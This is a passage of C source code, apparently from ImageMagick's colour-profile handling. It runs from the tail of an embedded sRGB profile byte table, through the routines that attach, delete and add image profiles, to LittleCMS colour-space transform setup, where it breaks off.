0x00, 0xd0, 0x00, 0xd5, 0x00, 0xdb, 0x00, 0xe0, 0x00, 0xe5, 0x00, 0xeb,
0x00, 0xf0, 0x00, 0xf6, 0x00, 0xfb, 0x01, 0x01, 0x01, 0x07, 0x01, 0x0d,
0x01, 0x13, 0x01, 0x19, 0x01, 0x1f, 0x01, 0x25, 0x01, 0x2b, 0x01, 0x32,
0x01, 0x38, 0x01, 0x3e, 0x01, 0x45, 0x01, 0x4c, 0x01, 0x52, 0x01, 0x59,
0x01, 0x60, 0x01, 0x67, 0x01, 0x6e, 0x01, 0x75, 0x01, 0x7c, 0x01, 0x83,
0x01, 0x8b, 0x01, 0x92, 0x01, 0x9a, 0x01, 0xa1, 0x01, 0xa9, 0x01, 0xb1,
0x01, 0xb9, 0x01, 0xc1, 0x01, 0xc9, 0x01, 0xd1, 0x01, 0xd9, 0x01, 0xe1,
0x01, 0xe9, 0x01, 0xf2, 0x01, 0xfa, 0x02, 0x03, 0x02, 0x0c, 0x02, 0x14,
0x02, 0x1d, 0x02, 0x26, 0x02, 0x2f, 0x02, 0x38, 0x02, 0x41, 0x02, 0x4b,
0x02, 0x54, 0x02, 0x5d, 0x02, 0x67, 0x02, 0x71, 0x02, 0x7a, 0x02, 0x84,
0x02, 0x8e, 0x02, 0x98, 0x02, 0xa2, 0x02, 0xac, 0x02, 0xb6, 0x02, 0xc1,
0x02, 0xcb, 0x02, 0xd5, 0x02, 0xe0, 0x02, 0xeb, 0x02, 0xf5, 0x03, 0x00,
0x03, 0x0b, 0x03, 0x16, 0x03, 0x21, 0x03, 0x2d, 0x03, 0x38, 0x03, 0x43,
0x03, 0x4f, 0x03, 0x5a, 0x03, 0x66, 0x03, 0x72, 0x03, 0x7e, 0x03, 0x8a,
0x03, 0x96, 0x03, 0xa2, 0x03, 0xae, 0x03, 0xba, 0x03, 0xc7, 0x03, 0xd3,
0x03, 0xe0, 0x03, 0xec, 0x03, 0xf9, 0x04, 0x06, 0x04, 0x13, 0x04, 0x20,
0x04, 0x2d, 0x04, 0x3b, 0x04, 0x48, 0x04, 0x55, 0x04, 0x63, 0x04, 0x71,
0x04, 0x7e, 0x04, 0x8c, 0x04, 0x9a, 0x04, 0xa8, 0x04, 0xb6, 0x04, 0xc4,
0x04, 0xd3, 0x04, 0xe1, 0x04, 0xf0, 0x04, 0xfe, 0x05, 0x0d, 0x05, 0x1c,
0x05, 0x2b, 0x05, 0x3a, 0x05, 0x49, 0x05, 0x58, 0x05, 0x67, 0x05, 0x77,
0x05, 0x86, 0x05, 0x96, 0x05, 0xa6, 0x05, 0xb5, 0x05, 0xc5, 0x05, 0xd5,
0x05, 0xe5, 0x05, 0xf6, 0x06, 0x06, 0x06, 0x16, 0x06, 0x27, 0x06, 0x37,
0x06, 0x48, 0x06, 0x59, 0x06, 0x6a, 0x06, 0x7b, 0x06, 0x8c, 0x06, 0x9d,
0x06, 0xaf, 0x06, 0xc0, 0x06, 0xd1, 0x06, 0xe3, 0x06, 0xf5, 0x07, 0x07,
0x07, 0x19, 0x07, 0x2b, 0x07, 0x3d, 0x07, 0x4f, 0x07, 0x61, 0x07, 0x74,
0x07, 0x86, 0x07, 0x99, 0x07, 0xac, 0x07, 0xbf, 0x07, 0xd2, 0x07, 0xe5,
0x07, 0xf8, 0x08, 0x0b, 0x08, 0x1f, 0x08, 0x32, 0x08, 0x46, 0x08, 0x5a,
0x08, 0x6e, 0x08, 0x82, 0x08, 0x96, 0x08, 0xaa, 0x08, 0xbe, 0x08, 0xd2,
0x08, 0xe7, 0x08, 0xfb, 0x09, 0x10, 0x09, 0x25, 0x09, 0x3a, 0x09, 0x4f,
0x09, 0x64, 0x09, 0x79, 0x09, 0x8f, 0x09, 0xa4, 0x09, 0xba, 0x09, 0xcf,
0x09, 0xe5, 0x09, 0xfb, 0x0a, 0x11, 0x0a, 0x27, 0x0a, 0x3d, 0x0a, 0x54,
0x0a, 0x6a, 0x0a, 0x81, 0x0a, 0x98, 0x0a, 0xae, 0x0a, 0xc5, 0x0a, 0xdc,
0x0a, 0xf3, 0x0b, 0x0b, 0x0b, 0x22, 0x0b, 0x39, 0x0b, 0x51, 0x0b, 0x69,
0x0b, 0x80, 0x0b, 0x98, 0x0b, 0xb0, 0x0b, 0xc8, 0x0b, 0xe1, 0x0b, 0xf9,
0x0c, 0x12, 0x0c, 0x2a, 0x0c, 0x43, 0x0c, 0x5c, 0x0c, 0x75, 0x0c, 0x8e,
0x0c, 0xa7, 0x0c, 0xc0, 0x0c, 0xd9, 0x0c, 0xf3, 0x0d, 0x0d, 0x0d, 0x26,
0x0d, 0x40, 0x0d, 0x5a, 0x0d, 0x74, 0x0d, 0x8e, 0x0d, 0xa9, 0x0d, 0xc3,
0x0d, 0xde, 0x0d, 0xf8, 0x0e, 0x13, 0x0e, 0x2e, 0x0e, 0x49, 0x0e, 0x64,
0x0e, 0x7f, 0x0e, 0x9b, 0x0e, 0xb6, 0x0e, 0xd2, 0x0e, 0xee, 0x0f, 0x09,
0x0f, 0x25, 0x0f, 0x41, 0x0f, 0x5e, 0x0f, 0x7a, 0x0f, 0x96, 0x0f, 0xb3,
0x0f, 0xcf, 0x0f, 0xec, 0x10, 0x09, 0x10, 0x26, 0x10, 0x43, 0x10, 0x61,
0x10, 0x7e, 0x10, 0x9b, 0x10, 0xb9, 0x10, 0xd7, 0x10, 0xf5, 0x11, 0x13,
0x11, 0x31, 0x11, 0x4f, 0x11, 0x6d, 0x11, 0x8c, 0x11, 0xaa, 0x11, 0xc9,
0x11, 0xe8, 0x12, 0x07, 0x12, 0x26, 0x12, 0x45, 0x12, 0x64, 0x12, 0x84,
0x12, 0xa3, 0x12, 0xc3, 0x12, 0xe3, 0x13, 0x03, 0x13, 0x23, 0x13, 0x43,
0x13, 0x63, 0x13, 0x83, 0x13, 0xa4, 0x13, 0xc5, 0x13, 0xe5, 0x14, 0x06,
0x14, 0x27, 0x14, 0x49, 0x14, 0x6a, 0x14, 0x8b, 0x14, 0xad, 0x14, 0xce,
0x14, 0xf0, 0x15, 0x12, 0x15, 0x34, 0x15, 0x56, 0x15, 0x78, 0x15, 0x9b,
0x15, 0xbd, 0x15, 0xe0, 0x16, 0x03, 0x16, 0x26, 0x16, 0x49, 0x16, 0x6c,
0x16, 0x8f, 0x16, 0xb2, 0x16, 0xd6, 0x16, 0xfa, 0x17, 0x1d, 0x17, 0x41,
0x17, 0x65, 0x17, 0x89, 0x17, 0xae, 0x17, 0xd2, 0x17, 0xf7, 0x18, 0x1b,
0x18, 0x40, 0x18, 0x65, 0x18, 0x8a, 0x18, 0xaf, 0x18, 0xd5, 0x18, 0xfa,
0x19, 0x20, 0x19, 0x45, 0x19, 0x6b, 0x19, 0x91, 0x19, 0xb7, 0x19, 0xdd,
0x1a, 0x04, 0x1a, 0x2a, 0x1a, 0x51, 0x1a, 0x77, 0x1a, 0x9e, 0x1a, 0xc5,
0x1a, 0xec, 0x1b, 0x14, 0x1b, 0x3b, 0x1b, 0x63, 0x1b, 0x8a, 0x1b, 0xb2,
0x1b, 0xda, 0x1c, 0x02, 0x1c, 0x2a, 0x1c, 0x52, 0x1c, 0x7b, 0x1c, 0xa3,
0x1c, 0xcc, 0x1c, 0xf5, 0x1d, 0x1e, 0x1d, 0x47, 0x1d, 0x70, 0x1d, 0x99,
0x1d, 0xc3, 0x1d, 0xec, 0x1e, 0x16, 0x1e, 0x40, 0x1e, 0x6a, 0x1e, 0x94,
0x1e, 0xbe, 0x1e, 0xe9, 0x1f, 0x13, 0x1f, 0x3e, 0x1f, 0x69, 0x1f, 0x94,
0x1f, 0xbf, 0x1f, 0xea, 0x20, 0x15, 0x20, 0x41, 0x20, 0x6c, 0x20, 0x98,
0x20, 0xc4, 0x20, 0xf0, 0x21, 0x1c, 0x21, 0x48, 0x21, 0x75, 0x21, 0xa1,
0x21, 0xce, 0x21, 0xfb, 0x22, 0x27, 0x22, 0x55, 0x22, 0x82, 0x22, 0xaf,
0x22, 0xdd, 0x23, 0x0a, 0x23, 0x38, 0x23, 0x66, 0x23, 0x94, 0x23, 0xc2,
0x23, 0xf0, 0x24, 0x1f, 0x24, 0x4d, 0x24, 0x7c, 0x24, 0xab, 0x24, 0xda,
0x25, 0x09, 0x25, 0x38, 0x25, 0x68, 0x25, 0x97, 0x25, 0xc7, 0x25, 0xf7,
0x26, 0x27, 0x26, 0x57, 0x26, 0x87, 0x26, 0xb7, 0x26, 0xe8, 0x27, 0x18,
0x27, 0x49, 0x27, 0x7a, 0x27, 0xab, 0x27, 0xdc, 0x28, 0x0d, 0x28, 0x3f,
0x28, 0x71, 0x28, 0xa2, 0x28, 0xd4, 0x29, 0x06, 0x29, 0x38, 0x29, 0x6b,
0x29, 0x9d, 0x29, 0xd0, 0x2a, 0x02, 0x2a, 0x35, 0x2a, 0x68, 0x2a, 0x9b,
0x2a, 0xcf, 0x2b, 0x02, 0x2b, 0x36, 0x2b, 0x69, 0x2b, 0x9d, 0x2b, 0xd1,
0x2c, 0x05, 0x2c, 0x39, 0x2c, 0x6e, 0x2c, 0xa2, 0x2c, 0xd7, 0x2d, 0x0c,
0x2d, 0x41, 0x2d, 0x76, 0x2d, 0xab, 0x2d, 0xe1, 0x2e, 0x16, 0x2e, 0x4c,
0x2e, 0x82, 0x2e, 0xb7, 0x2e, 0xee, 0x2f, 0x24, 0x2f, 0x5a, 0x2f, 0x91,
0x2f, 0xc7, 0x2f, 0xfe, 0x30, 0x35, 0x30, 0x6c, 0x30, 0xa4, 0x30, 0xdb,
0x31, 0x12, 0x31, 0x4a, 0x31, 0x82, 0x31, 0xba, 0x31, 0xf2, 0x32, 0x2a,
0x32, 0x63, 0x32, 0x9b, 0x32, 0xd4, 0x33, 0x0d, 0x33, 0x46, 0x33, 0x7f,
0x33, 0xb8, 0x33, 0xf1, 0x34, 0x2b, 0x34, 0x65, 0x34, 0x9e, 0x34, 0xd8,
0x35, 0x13, 0x35, 0x4d, 0x35, 0x87, 0x35, 0xc2, 0x35, 0xfd, 0x36, 0x37,
0x36, 0x72, 0x36, 0xae, 0x36, 0xe9, 0x37, 0x24, 0x37, 0x60, 0x37, 0x9c,
0x37, 0xd7, 0x38, 0x14, 0x38, 0x50, 0x38, 0x8c, 0x38, 0xc8, 0x39, 0x05,
0x39, 0x42, 0x39, 0x7f, 0x39, 0xbc, 0x39, 0xf9, 0x3a, 0x36, 0x3a, 0x74,
0x3a, 0xb2, 0x3a, 0xef, 0x3b, 0x2d, 0x3b, 0x6b, 0x3b, 0xaa, 0x3b, 0xe8,
0x3c, 0x27, 0x3c, 0x65, 0x3c, 0xa4, 0x3c, 0xe3, 0x3d, 0x22, 0x3d, 0x61,
0x3d, 0xa1, 0x3d, 0xe0, 0x3e, 0x20, 0x3e, 0x60, 0x3e, 0xa0, 0x3e, 0xe0,
0x3f, 0x21, 0x3f, 0x61, 0x3f, 0xa2, 0x3f, 0xe2, 0x40, 0x23, 0x40, 0x64,
0x40, 0xa6, 0x40, 0xe7, 0x41, 0x29, 0x41, 0x6a, 0x41, 0xac, 0x41, 0xee,
0x42, 0x30, 0x42, 0x72, 0x42, 0xb5, 0x42, 0xf7, 0x43, 0x3a, 0x43, 0x7d,
0x43, 0xc0, 0x44, 0x03, 0x44, 0x47, 0x44, 0x8a, 0x44, 0xce, 0x45, 0x12,
0x45, 0x55, 0x45, 0x9a, 0x45, 0xde, 0x46, 0x22, 0x46, 0x67, 0x46, 0xab,
0x46, 0xf0, 0x47, 0x35, 0x47, 0x7b, 0x47, 0xc0, 0x48, 0x05, 0x48, 0x4b,
0x48, 0x91, 0x48, 0xd7, 0x49, 0x1d, 0x49, 0x63, 0x49, 0xa9, 0x49, 0xf0,
0x4a, 0x37, 0x4a, 0x7d, 0x4a, 0xc4, 0x4b, 0x0c, 0x4b, 0x53, 0x4b, 0x9a,
0x4b, 0xe2, 0x4c, 0x2a, 0x4c, 0x72, 0x4c, 0xba, 0x4d, 0x02, 0x4d, 0x4a,
0x4d, 0x93, 0x4d, 0xdc, 0x4e, 0x25, 0x4e, 0x6e, 0x4e, 0xb7, 0x4f, 0x00,
0x4f, 0x49, 0x4f, 0x93, 0x4f, 0xdd, 0x50, 0x27, 0x50, 0x71, 0x50, 0xbb,
0x51, 0x06, 0x51, 0x50, 0x51, 0x9b, 0x51, 0xe6, 0x52, 0x31, 0x52, 0x7c,
0x52, 0xc7, 0x53, 0x13, 0x53, 0x5f, 0x53, 0xaa, 0x53, 0xf6, 0x54, 0x42,
0x54, 0x8f, 0x54, 0xdb, 0x55, 0x28, 0x55, 0x75, 0x55, 0xc2, 0x56, 0x0f,
0x56, 0x5c, 0x56, 0xa9, 0x56, 0xf7, 0x57, 0x44, 0x57, 0x92, 0x57, 0xe0,
0x58, 0x2f, 0x58, 0x7d, 0x58, 0xcb, 0x59, 0x1a, 0x59, 0x69, 0x59, 0xb8,
0x5a, 0x07, 0x5a, 0x56, 0x5a, 0xa6, 0x5a, 0xf5, 0x5b, 0x45, 0x5b, 0x95,
0x5b, 0xe5, 0x5c, 0x35, 0x5c, 0x86, 0x5c, 0xd6, 0x5d, 0x27, 0x5d, 0x78,
0x5d, 0xc9, 0x5e, 0x1a, 0x5e, 0x6c, 0x5e, 0xbd, 0x5f, 0x0f, 0x5f, 0x61,
0x5f, 0xb3, 0x60, 0x05, 0x60, 0x57, 0x60, 0xaa, 0x60, 0xfc, 0x61, 0x4f,
0x61, 0xa2, 0x61, 0xf5, 0x62, 0x49, 0x62, 0x9c, 0x62, 0xf0, 0x63, 0x43,
0x63, 0x97, 0x63, 0xeb, 0x64, 0x40, 0x64, 0x94, 0x64, 0xe9, 0x65, 0x3d,
0x65, 0x92, 0x65, 0xe7, 0x66, 0x3d, 0x66, 0x92, 0x66, 0xe8, 0x67, 0x3d,
0x67, 0x93, 0x67, 0xe9, 0x68, 0x3f, 0x68, 0x96, 0x68, 0xec, 0x69, 0x43,
0x69, 0x9a, 0x69, 0xf1, 0x6a, 0x48, 0x6a, 0x9f, 0x6a, 0xf7, 0x6b, 0x4f,
0x6b, 0xa7, 0x6b, 0xff, 0x6c, 0x57, 0x6c, 0xaf, 0x6d, 0x08, 0x6d, 0x60,
0x6d, 0xb9, 0x6e, 0x12, 0x6e, 0x6b, 0x6e, 0xc4, 0x6f, 0x1e, 0x6f, 0x78,
0x6f, 0xd1, 0x70, 0x2b, 0x70, 0x86, 0x70, 0xe0, 0x71, 0x3a, 0x71, 0x95,
0x71, 0xf0, 0x72, 0x4b, 0x72, 0xa6, 0x73, 0x01, 0x73, 0x5d, 0x73, 0xb8,
0x74, 0x14, 0x74, 0x70, 0x74, 0xcc, 0x75, 0x28, 0x75, 0x85, 0x75, 0xe1,
0x76, 0x3e, 0x76, 0x9b, 0x76, 0xf8, 0x77, 0x56, 0x77, 0xb3, 0x78, 0x11,
0x78, 0x6e, 0x78, 0xcc, 0x79, 0x2a, 0x79, 0x89, 0x79, 0xe7, 0x7a, 0x46,
0x7a, 0xa5, 0x7b, 0x04, 0x7b, 0x63, 0x7b, 0xc2, 0x7c, 0x21, 0x7c, 0x81,
0x7c, 0xe1, 0x7d, 0x41, 0x7d, 0xa1, 0x7e, 0x01, 0x7e, 0x62, 0x7e, 0xc2,
0x7f, 0x23, 0x7f, 0x84, 0x7f, 0xe5, 0x80, 0x47, 0x80, 0xa8, 0x81, 0x0a,
0x81, 0x6b, 0x81, 0xcd, 0x82, 0x30, 0x82, 0x92, 0x82, 0xf4, 0x83, 0x57,
0x83, 0xba, 0x84, 0x1d, 0x84, 0x80, 0x84, 0xe3, 0x85, 0x47, 0x85, 0xab,
0x86, 0x0e, 0x86, 0x72, 0x86, 0xd7, 0x87, 0x3b, 0x87, 0x9f, 0x88, 0x04,
0x88, 0x69, 0x88, 0xce, 0x89, 0x33, 0x89, 0x99, 0x89, 0xfe, 0x8a, 0x64,
0x8a, 0xca, 0x8b, 0x30, 0x8b, 0x96, 0x8b, 0xfc, 0x8c, 0x63, 0x8c, 0xca,
0x8d, 0x31, 0x8d, 0x98, 0x8d, 0xff, 0x8e, 0x66, 0x8e, 0xce, 0x8f, 0x36,
0x8f, 0x9e, 0x90, 0x06, 0x90, 0x6e, 0x90, 0xd6, 0x91, 0x3f, 0x91, 0xa8,
0x92, 0x11, 0x92, 0x7a, 0x92, 0xe3, 0x93, 0x4d, 0x93, 0xb6, 0x94, 0x20,
0x94, 0x8a, 0x94, 0xf4, 0x95, 0x5f, 0x95, 0xc9, 0x96, 0x34, 0x96, 0x9f,
0x97, 0x0a, 0x97, 0x75, 0x97, 0xe0, 0x98, 0x4c, 0x98, 0xb8, 0x99, 0x24,
0x99, 0x90, 0x99, 0xfc, 0x9a, 0x68, 0x9a, 0xd5, 0x9b, 0x42, 0x9b, 0xaf,
0x9c, 0x1c, 0x9c, 0x89, 0x9c, 0xf7, 0x9d, 0x64, 0x9d, 0xd2, 0x9e, 0x40,
0x9e, 0xae, 0x9f, 0x1d, 0x9f, 0x8b, 0x9f, 0xfa, 0xa0, 0x69, 0xa0, 0xd8,
0xa1, 0x47, 0xa1, 0xb6, 0xa2, 0x26, 0xa2, 0x96, 0xa3, 0x06, 0xa3, 0x76,
0xa3, 0xe6, 0xa4, 0x56, 0xa4, 0xc7, 0xa5, 0x38, 0xa5, 0xa9, 0xa6, 0x1a,
0xa6, 0x8b, 0xa6, 0xfd, 0xa7, 0x6e, 0xa7, 0xe0, 0xa8, 0x52, 0xa8, 0xc4,
0xa9, 0x37, 0xa9, 0xa9, 0xaa, 0x1c, 0xaa, 0x8f, 0xab, 0x02, 0xab, 0x75,
0xab, 0xe9, 0xac, 0x5c, 0xac, 0xd0, 0xad, 0x44, 0xad, 0xb8, 0xae, 0x2d,
0xae, 0xa1, 0xaf, 0x16, 0xaf, 0x8b, 0xb0, 0x00, 0xb0, 0x75, 0xb0, 0xea,
0xb1, 0x60, 0xb1, 0xd6, 0xb2, 0x4b, 0xb2, 0xc2, 0xb3, 0x38, 0xb3, 0xae,
0xb4, 0x25, 0xb4, 0x9c, 0xb5, 0x13, 0xb5, 0x8a, 0xb6, 0x01, 0xb6, 0x79,
0xb6, 0xf0, 0xb7, 0x68, 0xb7, 0xe0, 0xb8, 0x59, 0xb8, 0xd1, 0xb9, 0x4a,
0xb9, 0xc2, 0xba, 0x3b, 0xba, 0xb5, 0xbb, 0x2e, 0xbb, 0xa7, 0xbc, 0x21,
0xbc, 0x9b, 0xbd, 0x15, 0xbd, 0x8f, 0xbe, 0x0a, 0xbe, 0x84, 0xbe, 0xff,
0xbf, 0x7a, 0xbf, 0xf5, 0xc0, 0x70, 0xc0, 0xec, 0xc1, 0x67, 0xc1, 0xe3,
0xc2, 0x5f, 0xc2, 0xdb, 0xc3, 0x58, 0xc3, 0xd4, 0xc4, 0x51, 0xc4, 0xce,
0xc5, 0x4b, 0xc5, 0xc8, 0xc6, 0x46, 0xc6, 0xc3, 0xc7, 0x41, 0xc7, 0xbf,
0xc8, 0x3d, 0xc8, 0xbc, 0xc9, 0x3a, 0xc9, 0xb9, 0xca, 0x38, 0xca, 0xb7,
0xcb, 0x36, 0xcb, 0xb6, 0xcc, 0x35, 0xcc, 0xb5, 0xcd, 0x35, 0xcd, 0xb5,
0xce, 0x36, 0xce, 0xb6, 0xcf, 0x37, 0xcf, 0xb8, 0xd0, 0x39, 0xd0, 0xba,
0xd1, 0x3c, 0xd1, 0xbe, 0xd2, 0x3f, 0xd2, 0xc1, 0xd3, 0x44, 0xd3, 0xc6,
0xd4, 0x49, 0xd4, 0xcb, 0xd5, 0x4e, 0xd5, 0xd1, 0xd6, 0x55, 0xd6, 0xd8,
0xd7, 0x5c, 0xd7, 0xe0, 0xd8, 0x64, 0xd8, 0xe8, 0xd9, 0x6c, 0xd9, 0xf1,
0xda, 0x76, 0xda, 0xfb, 0xdb, 0x80, 0xdc, 0x05, 0xdc, 0x8a, 0xdd, 0x10,
0xdd, 0x96, 0xde, 0x1c, 0xde, 0xa2, 0xdf, 0x29, 0xdf, 0xaf, 0xe0, 0x36,
0xe0, 0xbd, 0xe1, 0x44, 0xe1, 0xcc, 0xe2, 0x53, 0xe2, 0xdb, 0xe3, 0x63,
0xe3, 0xeb, 0xe4, 0x73, 0xe4, 0xfc, 0xe5, 0x84, 0xe6, 0x0d, 0xe6, 0x96,
0xe7, 0x1f, 0xe7, 0xa9, 0xe8, 0x32, 0xe8, 0xbc, 0xe9, 0x46, 0xe9, 0xd0,
0xea, 0x5b, 0xea, 0xe5, 0xeb, 0x70, 0xeb, 0xfb, 0xec, 0x86, 0xed, 0x11,
0xed, 0x9c, 0xee, 0x28, 0xee, 0xb4, 0xef, 0x40, 0xef, 0xcc, 0xf0, 0x58,
0xf0, 0xe5, 0xf1, 0x72, 0xf1, 0xff, 0xf2, 0x8c, 0xf3, 0x19, 0xf3, 0xa7,
0xf4, 0x34, 0xf4, 0xc2, 0xf5, 0x50, 0xf5, 0xde, 0xf6, 0x6d, 0xf6, 0xfb,
0xf7, 0x8a, 0xf8, 0x19, 0xf8, 0xa8, 0xf9, 0x38, 0xf9, 0xc7, 0xfa, 0x57,
0xfa, 0xe7, 0xfb, 0x77, 0xfc, 0x07, 0xfc, 0x98, 0xfd, 0x29, 0xfd, 0xba,
0xfe, 0x4b, 0xfe, 0xdc, 0xff, 0x6d, 0xff, 0xff
};
StringInfo
*profile;
MagickBooleanType
status;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (GetImageProfile(image,"icc") != (const StringInfo *) NULL)
return(MagickFalse);
profile=AcquireStringInfo(sizeof(sRGBProfile));
SetStringInfoDatum(profile,sRGBProfile);
status=SetImageProfile(image,"icc",profile,exception);
profile=DestroyStringInfo(profile);
return(status);
}
MagickExport MagickBooleanType ProfileImage(Image *image,const char *name,
const void *datum,const size_t length,ExceptionInfo *exception)
{
#define ProfileImageTag "Profile/Image"
#define ThrowProfileException(severity,tag,context) \
{ \
if (source_profile != (cmsHPROFILE) NULL) \
(void) cmsCloseProfile(source_profile); \
if (target_profile != (cmsHPROFILE) NULL) \
(void) cmsCloseProfile(target_profile); \
ThrowBinaryException(severity,tag,context); \
}
MagickBooleanType
status;
StringInfo
*profile;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(name != (const char *) NULL);
if ((datum == (const void *) NULL) || (length == 0))
{
char
*next;
/*
Delete image profile(s).
*/
ResetImageProfileIterator(image);
for (next=GetNextImageProfile(image); next != (const char *) NULL; )
{
if (IsOptionMember(next,name) != MagickFalse)
{
(void) DeleteImageProfile(image,next);
ResetImageProfileIterator(image);
}
next=GetNextImageProfile(image);
}
return(MagickTrue);
}
/*
Add a ICC, IPTC, or generic profile to the image.
*/
status=MagickTrue;
profile=AcquireStringInfo((size_t) length);
SetStringInfoDatum(profile,(unsigned char *) datum);
if ((LocaleCompare(name,"icc") != 0) && (LocaleCompare(name,"icm") != 0))
status=SetImageProfile(image,name,profile,exception);
else
{
const StringInfo
*icc_profile;
icc_profile=GetImageProfile(image,"icc");
if ((icc_profile != (const StringInfo *) NULL) &&
(CompareStringInfo(icc_profile,profile) == 0))
{
const char
*value;
value=GetImageProperty(image,"exif:ColorSpace",exception);
(void) value;
if (LocaleCompare(value,"1") != 0)
(void) SetsRGBImageProfile(image,exception);
value=GetImageProperty(image,"exif:InteroperabilityIndex",exception);
if (LocaleCompare(value,"R98.") != 0)
(void) SetsRGBImageProfile(image,exception);
/* Future.
value=GetImageProperty(image,"exif:InteroperabilityIndex",exception);
if (LocaleCompare(value,"R03.") != 0)
(void) SetAdobeRGB1998ImageProfile(image,exception);
*/
icc_profile=GetImageProfile(image,"icc");
}
if ((icc_profile != (const StringInfo *) NULL) &&
(CompareStringInfo(icc_profile,profile) == 0))
{
profile=DestroyStringInfo(profile);
return(MagickTrue);
}
#if !defined(MAGICKCORE_LCMS_DELEGATE)
(void) ThrowMagickException(exception,GetMagickModule(),
MissingDelegateWarning,"DelegateLibrarySupportNotBuiltIn",
"'%s' (LCMS)",image->filename);
#else
{
cmsHPROFILE
source_profile;
CMSExceptionInfo
cms_exception;
/*
Transform pixel colors as defined by the color profiles.
*/
cmsSetLogErrorHandler(CMSExceptionHandler);
cms_exception.image=image;
cms_exception.exception=exception;
(void) cms_exception;
source_profile=cmsOpenProfileFromMemTHR((cmsContext) &cms_exception,
GetStringInfoDatum(profile),(cmsUInt32Number)
GetStringInfoLength(profile));
if (source_profile == (cmsHPROFILE) NULL)
ThrowBinaryException(ResourceLimitError,
"ColorspaceColorProfileMismatch",name);
if ((cmsGetDeviceClass(source_profile) != cmsSigLinkClass) &&
(icc_profile == (StringInfo *) NULL))
status=SetImageProfile(image,name,profile,exception);
else
{
CacheView
*image_view;
ColorspaceType
source_colorspace,
target_colorspace;
cmsColorSpaceSignature
signature;
cmsHPROFILE
target_profile;
cmsHTRANSFORM
*magick_restrict transform;
cmsUInt32Number
flags,
source_type,
target_type;
int
intent;
MagickOffsetType
progress;
size_t
source_channels,
target_channels;
ssize_t
y;
unsigned short
**magick_restrict source_pixels,
**magick_restrict target_pixels;
target_profile=(cmsHPROFILE) NULL;
if (icc_profile != (StringInfo *) NULL)
{
target_profile=source_profile;
source_profile=cmsOpenProfileFromMemTHR((cmsContext)
&cms_exception,GetStringInfoDatum(icc_profile),
(cmsUInt32Number) GetStringInfoLength(icc_profile));
if (source_profile == (cmsHPROFILE) NULL)
ThrowProfileException(ResourceLimitError,
"ColorspaceColorProfileMismatch",name);
}
switch (cmsGetColorSpace(source_profile))
{
case cmsSigCmykData:
{
source_colorspace=CMYKColorspace;
source_type=(cmsUInt32Number) TYPE_CMYK_16;
source_channels=4;
break;
}
case cmsSigGrayData:
{
source_colorspace=GRAYColorspace;
source_type=(cmsUInt32Number) TYPE_GRAY_16;
source_channels=1;
break;
}
case cmsSigLabData:
{
source_colorspace=LabColorspace;
source_type=(cmsUInt32Number) TYPE_Lab_16;
source_channels=3;
break;
}
case cmsSigLuvData:
{
source_colorspace=YUVColorspace;
source_type=(cmsUInt32Number) TYPE_YUV_16;
source_channels=3;
break;
}
case cmsSigRgbData:
{
source_colorspace=sRGBColorspace;
source_type=(cmsUInt32Number) TYPE_RGB_16;
source_channels=3;
break;
}
case cmsSigXYZData:
{
source_colorspace=XYZColorspace;
source_type=(cmsUInt32Number) TYPE_XYZ_16;
source_channels=3;
break;
}
case cmsSigYCbCrData:
{
source_colorspace=YCbCrColorspace;
source_type=(cmsUInt32Number) TYPE_YCbCr_16;
source_channels=3;
break;
}
default:
{
source_colorspace=UndefinedColorspace;
source_type=(cmsUInt32Number) TYPE_RGB_16;
source_channels=3;
break;
}
}
signature=cmsGetPCS(source_profile);
if (target_profile != (cmsHPROFILE) NULL)
signature=cmsGetColorSpace(target_profile);
switch (signature)
{
case cmsSigCmykData:
{
target_colorspace=CMYKColorspace;
target_type=(cmsUInt32Number) TYPE_CMYK_16;
target_channels=4;
break;
}
case cmsSigLabData:
{
target_colorspace=LabColorspace;
target_type=(cmsUInt32Number) TYPE_Lab_16;
target_channels=3;
break;
}
case cmsSigGrayData:
{
target_colorspace=GRAYColorspace;
target_type=(cmsUInt32Number) TYPE_GRAY_16;
target_channels=1;
break;
}
case cmsSigLuvData:
{
target_colorspace=YUVColorspace;
target_type=(cmsUInt32Number) TYPE_YUV_16;
target_channels=3;
break;
}
case cmsSigRgbData:
{
target_colorspace=sRGBColorspace;
target_type=(cmsUInt32Number) TYPE_RGB_16;
target_channels=3;
break;
}
case cmsSigXYZData:
{
target_colorspace=XYZColorspace;
target_type=(cmsUInt32Number) TYPE_XYZ_16;
target_channels=3;
break;
}
case cmsSigYCbCrData:
{
target_colorspace=YCbCrColorspace;
target_type=(cmsUInt32Number) TYPE_YCbCr_16;
target_channels=3;
break;
}
default:
{
target_colorspace=UndefinedColorspace;
target_type=(cmsUInt32Number) TYPE_RGB_16;
target_channels=3;
break;
}
}
if ((source_colorspace == UndefinedColorspace) ||
(target_colorspace == UndefinedColorspace))
ThrowProfileException(ImageError,"ColorspaceColorProfileMismatch",
name);
if ((source_colorspace == GRAYColorspace) &&
(SetImageGray(image,exception) == MagickFalse))
ThrowProfileException(ImageError,"ColorspaceColorProfileMismatch",
name);
if ((source_colorspace == CMYKColorspace) &&
(image->colorspace != CMYKColorspace))
ThrowProfileException(ImageError,"ColorspaceColorProfileMismatch",
name);
if ((source_colorspace == XYZColorspace) &&
(image->colorspace != XYZColorspace))
ThrowProfileException(ImageError,"ColorspaceColorProfileMismatch",
name);
if ((source_colorspace == YCbCrColorspace) &&
(image->colorspace != YCbCrColorspace))
ThrowProfileException(ImageError,"ColorspaceColorProfileMismatch",
name);
if ((source_colorspace != CMYKColorspace) &&
(source_colorspace != LabColorspace) &&
(source_colorspace != XYZColorspace) &&
(source_colorspace != YCbCrColorspace) &&
(IssRGBCompatibleColorspace(image->colorspace) == MagickFalse))
ThrowProfileException(ImageError,"ColorspaceColorProfileMismatch",
name);
switch (image->rendering_intent)
{
case AbsoluteIntent: intent=INTENT_ABSOLUTE_COLORIMETRIC; break;
case PerceptualIntent: intent=INTENT_PERCEPTUAL; break;
case RelativeIntent: intent=INTENT_RELATIVE_COLORIMETRIC; break;
case SaturationIntent: intent=INTENT_SATURATION; break;
default: intent=INTENT_PERCEPTUAL; break;
}
flags=cmsFLAGS_HIGHRESPRECALC;
#if defined(cmsFLAGS_BLACKPOINTCOMPENSATION)
if (image->black_point_compensation != MagickFalse)
flags|=cmsFLAGS_BLACKPOINTCOMPENSATION;
#endif
transform=AcquireTransformThreadSet(image,source_profile,
source_type,target_profile,target_type,intent,flags);
